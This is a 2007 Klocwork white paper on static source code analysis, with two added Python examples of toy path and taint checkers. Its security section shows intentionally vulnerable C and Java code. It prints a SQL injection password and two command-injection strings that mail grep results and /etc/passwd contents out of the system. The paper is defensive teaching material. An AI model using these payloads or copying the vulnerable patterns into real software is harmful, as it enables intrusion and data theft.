Klocwork Paper Static Analysis When Why How

When, Why and How to Leverage Source Code Analysis Tools

Finding critical bugs in C, C++ and Java code

Automated source code analysis is technology aimed at locating and describing areas of weakness in source code. Those weaknesses might be security vulnerabilities, logic errors, implementation defects, concurrency violations, rare boundary conditions, or many other types of problem-causing code. The name of the associated research field is static analysis. This is differentiated from more traditional dynamic analysis techniques such as unit or penetration test by the fact that the work is performed at build time using only the source code of the program or module in question. The results reported are therefore generated from a complete view of every possible execution path, rather than some aspect of a necessarily limited observed runtime behavior.

Perhaps the most obvious question confronting any new developer-facing technology is: why?

»» Why should developers use a new tool when they already have so many to choose from?

»» What makes this technology compelling enough to make me want to add it to my already bloated build chain?

»» And what does it do, anyway?

This paper will answer these questions, and more. But for the moment just consider the fact that at time of writing, 80% of the Fortune 500 have already deployed, or are currently engaged in deploying, some kind of automated source code analysis. The reasons for doing so can be stated in as many ways as there are people answering the question, but the basic principle can be found in all of these deployments:

»» Tell me what’s wrong with my code before I ship it – don’t let me be the guy responsible for shipping a killer vulnerability or bug into the wild.

There are other compelling reasons, such as:

»» Make my existing processes for code review more effective through automation

»» Enhance my existing QA resource with 100% coverage of all boundary conditions

»» Help me protect my brand as we go to market with new products

But the bottom line remains the capability of this technology to afford developers the ability to scrub their code of obvious and not-so-obvious weaknesses as they work, before they submit their code for check-in and more formal down-stream validation procedures.

GWYN FISHER, CTO
WHITE PAPER | OCTOBER 2007
WWW.KLOCWORK.COM



Introduction to the Technology

The process of automated source code analysis involves building a rich representation or model of the provided code (akin to a compilation phase), and then simulating all possible execution paths through that model, mapping out the flow of logic on those paths coupled with how and where data objects are created, used and destroyed.

Once the projection of code paths and the mapping of data objects are available, we can look for anomalous conditions that either will or might potentially cause exploitable vulnerabilities, execution failure, or data corruption at runtime.

There are two major families of checking capability typical to this type of analysis: abstract syntax tree (AST) validation and code path analysis. The former case is most frequently applied to validation of the basic syntax and structure of code, whereas the latter is used for more complete types of analysis that depend on understanding the state of a program’s data objects at any particular point on a code execution path.

Abstract Syntax Trees

An abstract syntax tree, or AST for short, is simply a tree-structured representation of the source code as might be typically generated by the preliminary parsing stages of a compiler. This tree contains a rich breakdown of the structure of the code in a non-ambiguous manner, allowing for simple searches to be performed for anomalous syntax.

Consider the example of an organization wishing to enforce a set of corporate coding standards. Stated in the standard is the basic requirement for the use of a compound statement block rather than single statements as the body of a loop (e.g. a for-loop). In this case, an AST check is what would be appropriate:

INCORRECT:

    for( i = 0; i < 10; i++ ) doSomething();

CORRECT:

    for( i = 0; i < 10; i++ ) { doSomething(); }

In this example, the (simplified, for clarity) AST for the incorrect case would conceptually appear as follows:

    For-loop
      Statement
        doSomething()

In contrast to which, the AST for the correct case would conceptually appear as follows:

    For-loop
      Statement block
        Statement
          doSomething()

As you can imagine, constructing checkers that look for this type of standards violation is quite straightforward and depends solely on the syntax of the code itself and not on the runtime behavior, or state, of that code. Essentially, the checker would be instructed to find all instances of “For-loop” nodes that contain a “Statement” node as an immediate descendant, and to flag them as violations.

Similarly, AST checkers can easily be constructed to enforce standards around naming conventions, function call restrictions (e.g. unsafe library checks), etc. Anything that can be inferred from the code without requiring knowledge of that code’s runtime behavior is typically a target for AST checking.


Given the simple nature of what AST checkers can actually do, there are many tools that offer this type of checking for various different languages, some of which are freely available from the open source community, for example PMD for Java. Several of these tools use XPath, or an XPath-derived grammar, to define the conditions that the checkers look for, and customers should consider adopting solutions that provide extensibility mechanisms for creating AST checkers. This type of checking is relatively simple to do, and constructing new checkers of this type for corporate coding standards or industry recommended best practice is a common endeavor.

Code Path Analysis

Consider now a more complex example. This time instead of looking for style violations, we wish to check whether an attempted dereference of a pointer should be expected to succeed or fail:

    if( x & 1 ) ptr = NULL;
    *ptr = 1;

In this case it is obvious from manual inspection that the variable “ptr” can assume a NULL value whenever the variable “x” is odd, and that this condition will cause an unavoidable zero-page dereference.

Attempting to find a bug of this type using AST scanning, however, is seriously non-trivial. Consider the (simplified, for clarity) AST that would be created from that snippet of code:

    Statement Block
      If-statement
        Check-Expression
          Binary-operator &
            x
            1
        True-Branch
          Expression-statement
            Assignment-operator =
              ptr
              0
      Expression-statement
        Assignment-operator =
          Dereference-pointer
            ptr
          1

In this case, there is no obvious tree search or simple node enumeration that could cover the attempted, and at least occasionally illegal, dereferencing of “ptr” in anything like a reasonably generalized form. So for cases such as this, it is necessary to take a step beyond simply searching for patterns of syntax, and to analyze the lifecycle of data objects as they appear and are used within a control path’s flow of execution.

Code path analysis tracks objects within a code execution path and allows checkers to validate the legality or cleanliness of the data as it gets used. In the example above, the AST that is built for simple types of style and syntax checks is rewritten in a form that allows an answer to be generated for the following question:

»» Is there a valid, reachable code path on which the assignment of NULL is followed by an attempted dereference without an intermediate check?


Consider the following example of control flow and data object usage:

    void f(int x, int y)
    {
        int value, *p, *q;
        p = (x & 1) ? NULL : &value;
        if( p ) *p = 1;
        q = p;
        if( y & 1 ) *q = 1;
    }

In this instance we will unavoidably crash whenever both ‘x’ and ‘y’ are odd. Finding this situation requires a rich representation that reflects the start, or trigger, of a given code path, any propagation or aliasing that occurs during the execution of that code path, and the end, or sink, of the code path.

In our example, the trigger for the code path that interests us is the assignment of a NULL value to a pointer:

    p = (x & 1) ? NULL : &value;

Once this assignment is made, we can reasonably begin looking along the ensuing reachable code paths to check for propagation and/or illegal sink conditions. In our example, the first potential sink occurs using the variable ‘p’:

    if( p ) *p = 1;

As the value of the pointer is checked for legality, however, this isn’t an illegal sink condition and so can be ignored. Next, we have propagation:

    q = p;

From this point forwards in the reachable code path set, references to ‘q’ are as valid as references to ‘p’, as they are now aliases of each other (until otherwise assigned). Knowing this, the system can again validate a potential sink:

    if( y & 1 ) *q = 1;

In this case, it is entirely possible to follow a legal code path all the way from the assignment of NULL through to the use of that NULL in a crash-causing context, and so a path analysis defect will be reported.

Obviously this is only one type of the many different questions that can be answered using this type of analysis, such as:

»» Is this newly created object released before all aliases to it are removed from scope?

»» Is this data object ever range-checked before being passed to an OS function?

»» Is this string ever checked for special characters before being submitted as a SQL query?

»» Will this copy operation result in a buffer overflow?

»» Is it safe to call this function at this time?

By following code execution paths, either forward from a trigger event towards a target scenario, or backwards from a trigger event towards a required initialization, we can determine the answers to these questions and provide error reports when the target scenario or initialization either does or does not occur as expected.

This type of capability is required to do sophisticated analysis of source code, and customers should look for tools that provide comprehensive code path analysis to enable the location of flaws such as memory leaks, invalid pointer dereferences, unsafe or tainted data propagation, concurrency violations, and many other types of problem-causing conditions as described in the next section.
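Added example (not Klocwork's code, and not from the paper): a toy path-sensitive checker that performs the trigger / propagation / sink walk just described, over a small hand-made IR rather than real C. The paper's `if( x & 1 ) ptr = NULL; *ptr = 1;` snippet and the `f(int x, int y)` function above are transcribed into that IR, and a guarded variant is constructed to show the clean case; the IR, its statement names and the two-valued NULL/VALID pointer model are assumptions of this example.

```python
"""Toy path-sensitive NULL-dereference checker (added example, not Klocwork's code).

A pointer on a given path is either NULL or VALID (absent = unknown); opaque
conditions such as "x&1" are forked once and then remembered on that path.
"""

NULL, VALID = "NULL", "VALID"

# IR statements (constructed for this example):
#   ("set", ptr, value)                    ptr = NULL / ptr = &value  (trigger if NULL)
#   ("set_if", ptr, pred, v_true, v_false) ptr = pred ? v_true : v_false
#   ("alias", dst, src)                    dst = src                  (propagation)
#   ("if", ("nonnull", ptr), body)         if( ptr ) { body }
#   ("if", ("pred", name), body)           if( opaque condition ) { body }
#   ("deref", ptr)                         *ptr = ...                 (sink)


def branches(pred, assume):
    """Fork both ways on a fresh predicate; reuse the truth value once decided."""
    return [assume[pred]] if pred in assume else [True, False]


def analyze(prog):
    """Walk every feasible path; return [(ptr, path)] where NULL reaches a deref."""
    defects = []

    def walk(stmts, state, assume, path):
        # state: ptr -> NULL/VALID on this path; assume: predicate -> truth
        # already taken on this path; path: the decisions that led here.
        if not stmts:
            return
        st, rest = stmts[0], stmts[1:]
        kind = st[0]
        if kind == "set":
            walk(rest, {**state, st[1]: st[2]}, assume, path)
        elif kind == "alias":
            new = dict(state)
            new.pop(st[1], None)
            if st[2] in state:
                new[st[1]] = state[st[2]]      # dst now shares src's value
            walk(rest, new, assume, path)
        elif kind == "deref":
            if state.get(st[1]) == NULL:
                defects.append((st[1], path))  # sink reached by a NULL trigger
            walk(rest, state, assume, path)
        elif kind == "set_if":
            _, ptr, pred, v_true, v_false = st
            for truth in branches(pred, assume):
                walk(rest, {**state, ptr: v_true if truth else v_false},
                     {**assume, pred: truth}, path + [f"{pred}={truth}"])
        elif kind == "if":
            _, (ctype, name), body = st
            if ctype == "pred":
                for truth in branches(name, assume):
                    walk((body if truth else []) + rest, state,
                         {**assume, name: truth}, path + [f"{name}={truth}"])
            else:
                # A NULL test refines the pointer on each side; a side that
                # contradicts what this path already knows is infeasible.
                known = state.get(name)
                if known != NULL:
                    walk(body + rest, {**state, name: VALID}, assume,
                         path + [f"{name}!=NULL"])
                if known != VALID:
                    walk(rest, {**state, name: NULL}, assume,
                         path + [f"{name}==NULL"])
        else:
            raise ValueError(f"unknown statement {st!r}")

    walk(list(prog), {}, {}, [])
    return defects


# The paper's void f(int x, int y), transcribed statement by statement.
PROG_ALIAS = [
    ("set_if", "p", "x&1", NULL, VALID),         # p = (x & 1) ? NULL : &value;
    ("if", ("nonnull", "p"), [("deref", "p")]),  # if( p ) *p = 1;
    ("alias", "q", "p"),                         # q = p;
    ("if", ("pred", "y&1"), [("deref", "q")]),   # if( y & 1 ) *q = 1;
]
# The paper's earlier two-line snippet, transcribed.
PROG_SIMPLE = [
    ("if", ("pred", "x&1"), [("set", "ptr", NULL)]),  # if( x & 1 ) ptr = NULL;
    ("deref", "ptr"),                                 # *ptr = 1;
]
# Constructed clean variant: the store through the alias is guarded.
PROG_SAFE = [
    ("set_if", "p", "x&1", NULL, VALID),
    ("alias", "q", "p"),
    ("if", ("nonnull", "q"), [("deref", "q")]),
]
```

For `PROG_ALIAS` the checker reports one defect, on `q`, reached only along the path where `x&1` and `y&1` are both true and `p` failed its own test, which is exactly the "both odd" condition the text describes.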


What Type of Issues Can Be Found?

In this section, we will walk through a number of examples of problems that can be identified using modern static analysis tools, showing how they occur and what can happen if they are not remedied before shipment. Whilst many more types of weakness can be found using Klocwork’s tools, these examples should give the reader a firm grounding in what a good static analysis suite can do, regardless of the vendor.

Note that the examples given here are shown in a variety of C/C++ and Java. Where appropriate, the relevant capabilities within the product are available in all supported languages, however.

Security vulnerabilities

Traditionally of interest to developers working on consumer-facing applications, security is becoming more and more critical to developers in all types of environments, even those that have until recently considered security to be a non-issue. Some of the more important areas of security that can be found with source code analysis are:

»» Denial of service
»» SQL injection
»» Buffer overflow
»» Cross-site scripting (XSS)
»» Process/file injection

Denial of service

As could be guessed from the name, this type of vulnerability reflects a desire on the part of an attacker to deny access to a service offered by one or more processes under attack. This can be caused many different ways, from actually crashing the process, to choking the service with an inordinate number of requests, to resource constraining the service to the point of it becoming useless, etc. Attack vectors that are exposed to such approaches can often be spotted in code that is not created to be defensive, but rather makes naïve assumptions about the operating environment within which it will be running.

Consider the following example:

    public void f(String name, Properties props) throws IOException
    {
        InputStream is;
        is = getClass().getClassLoader().getResourceAsStream(name);
        if( is != null ) {
            props.load(is);
        }
    }

This simple function can easily cause a resource constraint within a server that will eventually lead to a DoS condition. Every time this function is called a new instance of the named properties collection will be created and will not be closed. Call this function within the main request handler of a service and it won’t take long for the service to crawl to a halt.

Likewise, creating resources using data that has not been validated (a practice known as taint propagation) can quickly choke a service:

    public void doGet(HttpServletRequest req, HttpServletResponse res)
    {
        String val = req.getParameter("size");
        Map props = new HashMap(Integer.parseInt(val));
        …
    }


Here the tainted data, as retrieved from an incoming HTTP parameter, is passed without validation into the constructor for a Collection object, an operation that can easily be attacked to cause the service to shut down.

Note that while this example uses a Java web servlet request for demonstration purposes, many DoS attack vectors exist within process boundary conditions that are normally entirely within the control of the developer writing the application. This tends to lead to assumptions being made about the data that will be marshaled across that boundary, allowing an attacker to disrupt service simply by placing unexpected ranges of data on what is supposed to be a clean wire, as shown in this example:

    void readDataFromWire(unsigned char* stream)
    {
        int bytes = (int)(*stream++);
        unsigned char* buffer = (unsigned char*)malloc(bytes);
        …
    }

Without checking the value of the ‘bytes’ variable, there is no way to guarantee that the subsequent allocation won’t cause a failure, or potentially worse a significant constraint on available memory for other parts of the process, to occur.

SQL Injection

SQL-based attacks focus on sloppily-constructed queries that can result in the attacker being able to completely compromise the underlying database security model. Consider the following example of a login validation query:

    SELECT ID FROM USERS WHERE NAME='user' AND PWD='password';

Incoming parameters from the user are substituted into the expression and the query is executed. Consider a set of parameters provided by an attacker:

    NAME: x
    PWD:  x' OR '1' = '1

That bizarre-looking password, if not appropriately filtered by the application, results in the login validation query performing a retrieval of every ID in the system:

    SELECT ID FROM USERS WHERE NAME='x' AND PWD='x' OR '1' = '1';

If this is compounded by the login simply checking for success or failure of this statement (as opposed to counting result rows), the attacker is quickly granted whatever access rights might be available from whatever user records are processed by the application. In applications where the first row of the user table is reserved for the super-user, the application could easily be completely compromised.

There are many other forms of attack possible using applications that are not careful in their treatment of substitution strings within database statements. Luckily, a large percentage of the mistakes most commonly made in preparing such statements can be found by checking strings that are being provided to database functions for taint, or the lack thereof.

    public void query(HttpServletRequest req, Connection conn) throws Exception
    {
        Statement stmt = conn.createStatement();
        String val = req.getParameter("User");
        stmt.executeQuery("select * from users where user='" + val + "';");
    }


In this example, the tainted input value “val” was retrieved from the incoming request and substituted into a database statement without first having been scrubbed for characters outside of the alphanumeric range. Any such usage is subject to attack, and will cause warnings to be generated by the tool.

Buffer overflow

Buffers or arrays that are improperly handled can potentially lead to process corruption and even the execution of arbitrary code injected by an attacker. Consider the following example:

    void f(unsigned char* stream)
    {
        unsigned char buf[32];
        memcpy(buf, stream + 1, *stream);
        …
    }

In this trivial case, the author has made a fundamental assumption about the cleanliness of the incoming data, coupled with an architectural assumption about the range of that data. If this function is used in an environment open to attack, for example to process marshaled data from another process or server, or even from a file that is subject to injection on the user’s system, the attacker could cause considerable stack corruption simply by exploiting the fact that the code will happily copy up to 255 bytes into a buffer able to hold only 32. A particularly accomplished attacker could use this exploit to inject carefully crafted code that effectively hijacks the process by inserting dummy stack content and overwriting one or more call frames.

A recent, high profile security breach in Microsoft Windows was caused by exactly this scenario. The “animated cursor vulnerability” as it was known was caused by a section of code that effectively performed the following operations:

    HICON LoadAniIcon(…)
    {
        …
        ANIHEADER myAniHeader;
        memcpy(&myAniHeader, untrustedData->data, untrustedData->length);
        …
    }

Given sufficient time, motivation and resource, attackers were able to completely compromise target systems simply by encouraging users to load and use carefully crafted animated cursor files. Those cursor files contained structures guaranteed to cause this operation to overflow available space, to therefore corrupt the stack, and to place on the resulting stack a frame intended to transfer control to functions open to compromise.

Cross-site scripting (XSS)

One of the first restrictions placed on JavaScript in early browser versions was to build a wall around page content so that scripts executing within a frame served by one site could not access content of frames served by another site. Cross-site scripting, therefore, is an attack pattern that focuses on enabling script from one site (the attacker’s site) to access content from another site (e.g. the user’s bank account site). In order to do this, the user must typically visit either a malicious or a naïve web site, obviously, although many experiments in social engineering have shown that users can be funneled towards even the most outlandish of sites quite readily.

In terms of physical manifestation, the most common form of XSS requires unfiltered HTML to be reflected back to the user from a server request. One common early attack vector was search engine result pages, which typically reflected the user’s query term in the title of the page. Without filtering, this reflected query term could easily contain HTML tags that were not correctly encoded and will therefore be interpreted as valid HTML by the receiving browser.

In essence, any reflection of unfiltered incoming data will trigger a warning from the tool, as the number and variety of exploits resulting from XSS grows every day. For example:

    public void doGet(HttpServletRequest req, HttpServletResponse res)
    {
        String title = req.getParameter("searchTerm");
        res.getOutputStream().write(title.getBytes("UTF-8"));
    }

Other manifestations of XSS revolve around the persistent storage of unfiltered user input that is later used to provide response content. This is a more difficult type of XSS to diagnose, as the attack pattern depends not only on a user’s unfiltered input being stored, but on that stored tainted data being made available to every user from that point onwards. Naïve forum software packages were particularly susceptible to this attack pattern in the early days of the web, but in essence any application that stores incoming unfiltered web data in a database (or file) and then reflects that stored data back to the user at a later date is vulnerable to this persistent form of XSS. Due to this attack pattern being so destructive if exploited, the tool triggers a warning whenever unfiltered data is retrieved from persistent storage and forwarded to the user.

Process or file injection

Of particular value to attackers, and therefore particularly to be avoided by authors, are attack vectors that allow the modification of system commands and/or system files. Performing process creation using tainted input, or creating files using tainted names or locations, are the most prevalent mistakes made.

Consider the following:

    void doListing(char* name)
    {
        char command[256];
        if( strlen(name) < 250 ) {
            sprintf(command, "ls %s", name);
            system(command);
        }
    }

In this example the author has left themselves open to malicious attack by not scrubbing the incoming file name before appending it to an innocuous-looking command. Consider input that gets appended by this function without further processing to the “ls” command such as:

    -R / | grep secret | mail [email protected]

or

    /dev/null | cat /etc/passwd | awk -F: '{print $1}' | mail [email protected]

In general, any exit point to the underlying OS that uses either a command or file name must be validated for special characters prior to the call being placed. Failure to do so may well result in catastrophic results for the operating environment.
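Added example (not Klocwork's code, and not from the paper): a toy taint checker for the question the SQL injection, XSS, wire-allocation and process injection passages above all ask, namely whether untrusted input reaches a sink without a check that suits that particular sink. The paper's `query()`, `doGet()`, `readDataFromWire()` and `doListing()` snippets are transcribed into a hand-made IR, plus a constructed fix and a constructed near-miss; the IR, the check names and the sink policy table are assumptions of this example.

```python
"""Toy taint-propagation checker (added example, not Klocwork's code).

Untrusted input is the trigger, string building propagates it, and a sink is
only clean if a check suited to *that* sink was applied somewhere on the way.
"""

# Which checks make a tainted value acceptable for each sink kind.
# Constructed policy for this example; a real tool ships a far larger table.
SINK_POLICY = {
    "sql": {"sql_parameterize", "alnum_only"},
    "html": {"html_encode"},
    "exec": {"alnum_only"},
    "alloc": {"range_check"},
}

# IR statements (constructed for this example):
#   ("source", var, origin)        var receives untrusted input
#   ("concat", dst, parts)         dst = parts joined; a part is a var name or,
#                                  if no such var is tainted, a string literal
#   ("sanitize", dst, src, check)  dst = check(src)
#   ("sink", kind, var)            var is handed to a sink of the given kind


def analyze(prog):
    """Return [(sink_kind, var, origin)] for tainted values reaching a sink unchecked."""
    taint = {}    # var -> (origin, frozenset of checks applied so far)
    defects = []
    for st in prog:
        kind = st[0]
        if kind == "source":
            taint[st[1]] = (st[2], frozenset())
        elif kind == "concat":
            dst, parts = st[1], st[2]
            tainted = [taint[p] for p in parts if p in taint]
            taint.pop(dst, None)
            if tainted:
                # Only checks applied to every tainted part survive concatenation.
                checks = frozenset.intersection(*(t[1] for t in tainted))
                taint[dst] = (tainted[0][0], checks)
        elif kind == "sanitize":
            dst, src, check = st[1], st[2], st[3]
            entry = taint.get(src)       # read before pop: dst may equal src
            taint.pop(dst, None)
            if entry is not None:
                taint[dst] = (entry[0], entry[1] | {check})
        elif kind == "sink":
            sink_kind, var = st[1], st[2]
            if var in taint:
                origin, checks = taint[var]
                if not checks & SINK_POLICY[sink_kind]:
                    defects.append((sink_kind, var, origin))
        else:
            raise ValueError(f"unknown statement {st!r}")
    return defects


# query(): the "User" parameter is concatenated into the statement text.
PROG_SQLI = [
    ("source", "val", 'req.getParameter("User")'),
    ("concat", "stmt", ["select * from users where user='", "val", "';"]),
    ("sink", "sql", "stmt"),
]
# Constructed fix: the value is bound as a statement parameter instead.
PROG_SQLI_FIXED = [
    ("source", "val", 'req.getParameter("User")'),
    ("sanitize", "val", "val", "sql_parameterize"),
    ("sink", "sql", "val"),
]
# Constructed near-miss: HTML encoding is the wrong check for a SQL sink.
PROG_WRONG_CHECK = [
    ("source", "val", 'req.getParameter("User")'),
    ("sanitize", "val", "val", "html_encode"),
    ("concat", "stmt", ["select * from users where user='", "val", "';"]),
    ("sink", "sql", "stmt"),
]
# doGet(): the search term is written straight back into the response.
PROG_XSS = [("source", "title", 'req.getParameter("searchTerm")'),
            ("sink", "html", "title")]
# readDataFromWire(): a length byte read off the wire sizes the malloc().
PROG_ALLOC = [("source", "bytes", "*stream"), ("sink", "alloc", "bytes")]
# doListing(): the argument is appended to "ls" and handed to system().
PROG_EXEC = [("source", "name", "doListing argument"),
             ("concat", "command", ["ls ", "name"]),
             ("sink", "exec", "command")]
```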


Another example shows a file-specific attack vector:

    public void doPost(HttpServletRequest req, HttpServletResponse resp)
    {
        String loc = req.getParameter("name");
        unpackFilesTo(loc, req.getInputStream());
    }

    private void unpackFilesTo(String loc, InputStream data)
    {
        File dir = new File("./unpacked/", loc);
        …
    }

In this example, a potentially tainted string is used to construct a relative path name. Unfortunately for the author, the File constructor used here places no restriction on the use of “../” being a path element, thus leaving this application wide open to arbitrary file creation and/or overwrite.

Implementation defects

Regardless of the application being developed, implementation defects that escape into the wild have significant impact on the product being deployed. This could range from increased support costs to ongoing brand criticism to bottom line impact from inventory reversal. Releasing a quality product is everybody’s goal, and static analysis tools can help significantly in bringing that product to market. Some of the more important areas of quality and ongoing maintenance are:

»» Memory management; leaks, using released memory, etc.
»» NULL pointer dereference/exception
»» Array bounds violations
»» Concurrency flaws and deadlocks

Memory management mistakes

Memory allocation and the correct releasing of that memory is a major source of defects, particularly in C and C++ code. Static analysis is well applied in this area, due to comprehensive coverage of code paths that can result in rare boundary conditions being signaled that might never be found using traditional runtime profiling tools.

Comprehensive static analysis tools should be able to track allocations and aliases of allocated memory to ensure that all allocations are released, that code paths do not attempt to make use of released memory, and that memory objects are not released twice.

    void f(…)
    {
        char* p = (char*)malloc(32);
        char* q = p;
        /* Use of unchecked allocation, might well be NULL */
        strcpy(p, "hello world");
        /* Release the memory by freeing an alias */
        free(q);
        /* Attempted use of already released memory */
        strcpy(p, "not good");
        free(p);
    }


NULL pointer dereference

Defects involving NULL pointers are as old as programming itself, and still as prevalent today as in any time before. We all understand what NULL pointers can do, and we all spend time looking for them and dealing with the after-effects of their being found in the wild. But consider the following example coding pattern that is fairly prevalent in even well-known and modern code bases:

    void f(char* ptr)
    {
        if( *ptr && ptr )
            …
    }

Or perhaps a Java example – just because there aren’t pointers in the language doesn’t mean you can’t dereference a NULL object reference:

    public void f(String str)
    {
        if( str.length() == 0 || str == null )
            return;
        …
    }

Functions that return NULL under aberrant conditions, and whose returned values are later de-referenced, are particularly difficult to diagnose. If the static analyzer is able to consider every potential code path, however unlikely, even these rare boundary conditions are found and reported.

Array bounds violations

Accessing arrays out of bounds is an incredibly common mistake, even by senior developers. Consider the following example from code written by a vendor in support of their device under Linux (details obscured):

    int f()
    {
        struct devinfo* dev[8];
        int i;
        get_device_info(dev, 8);
        for( i = 0; dev[i] && (i < 8); i++ ) {
            …
        }
    }

In many instances, perhaps the majority of the time, this code will run without hiccup. But eventually it is guaranteed to cause a bus fault or page violation based on the index check being performed after that index is used to access the ‘dev’ array.

Concurrency violations

With the trend towards more and more multi-core designs at the chip level, developers are increasingly being called upon to create threaded, or at least thread-aware, software. This places additional burden in terms of understanding how certain OS calls interact with locks that can cause threads to hang, and potentially to deadlock two or more threads in a process.

Only a handful of tools, such as the ones provided by Klocwork, are able to apply validations in the area of concurrency, such as ensuring that threads holding locks do not attempt to suspend or halt themselves, that locks are correctly released, and that lock holders do not attempt real-time pausing activities.


For example:

    pthread_mutex_t lock;

    void f()
    {
        pthread_mutex_lock(&lock);
        sleep(30);   /* hold the lock for 30 s */
        pthread_mutex_unlock(&lock);
    }

In this pathological example, all threads requiring access to the “lock” mutex would be deadlocked for 30s waiting for this segment to unlock.

Worse yet, the following example shows a never-released lock:

    void f()
    {
        pthread_mutex_lock(&lock);
        switch( op() ) {
            case 0:
                return;
            default:
                break;
        }
        pthread_mutex_unlock(&lock);
    }

In the case where the function “op” returns zero, the calling thread will maintain the mutex on return. Assuming this lock is being used for task scheduling or other typical server activities, the obvious result is a hung system.

Another aspect of concurrency is concurrent modification of data objects. The following example shows a Java Collection operation that will be flagged as illegal:

    public void f(Collection coll)
    {
        for( Iterator it = coll.iterator(); it.hasNext(); ) {
            String el = (String)it.next();
            if( el.startsWith("/") )
                coll.remove(el);
        }
    }

In fact, this operation is illegal even in a single threaded environment as it violates a basic contract within the Collections framework, but in a multi-threaded environment the likelihood of this causing a data corrupting problem within the Collection itself is vastly increased.

Summary

As a developer considering using automated source code analysis, or a development manager considering providing such analysis tools for a group of coders, it should be obvious from the previous sections of this document what kind of problems can be found and how this might apply in day-to-day situations. In addition to what is described here, more types of problems can be found by Klocwork’s tools, ranging from additional types of security or quality defects, to locating dead code, to incomplete or redundant header inclusion, to architectural coherence, to metrics violations, and many others.

One of the key aspects of any development tool is how it works for the developer, and by providing IDE integration with the most commonly used environments (Visual Studio, Eclipse, IDEA, Wind River Workbench, QNX Momentics, etc.) as well as robust command line tools for more traditional development environments, Klocwork is all about supporting developers in their native habitat.

Who wants to be the person on the hot seat when a critical vulnerability is exploited in the field, or when a coding mistake causes an inventory turnaround and costs your company serious money? Avoid that exposure by performing the most rigorous form of automated code review possible today, and do it on your desktop at the same time as you build your code.

Klocwork your source code and feel confident that you’re checking in the most secure and defect-free code you’ve ever created.

About the Author

Gwyn Fisher is the CTO of Klocwork and is responsible for guiding the company’s technical direction and strategy. With nearly 20 years of global technology experience, Gwyn brings a valuable combination of vision, experience, and direct insight into the developer perspective. With a background in formal grammars and computational linguistics, Gwyn has spent much of his career working in the search and natural language domains, holding senior executive positions with companies like Hummingbird, Fulcrum Technologies, PC DOCS and LumaPath. At Klocwork, Gwyn has returned to his original passion, compiler theory, and is leveraging his experience and knowledge of the developer mindset to move the practical domain of static analysis to the next level.

About Klocwork

Klocwork® offers a portfolio of software development productivity tools designed to ensure the security, quality and maintainability of complex code bases. Using proven static analysis technology, Klocwork’s tools identify critical security vulnerabilities and quality defects, optimize peer code review, and help developers create more maintainable code. Klocwork’s tools are an integral part of the development process for over 850 customers in the consumer electronics, mobile devices, medical technologies, telecom, military and aerospace sectors.

IN THE UNITED STATES:
15 New England Executive Park
Burlington, MA 01803

IN CANADA:
30 Edgewater Street, Suite 114
Ottawa, ON K2L 1V8

t: 1.866.556.2967
f: 613.836.9088
WWW.KLOCWORK.COM

© Copyright Klocwork Inc. 2010 · All Rights Reserved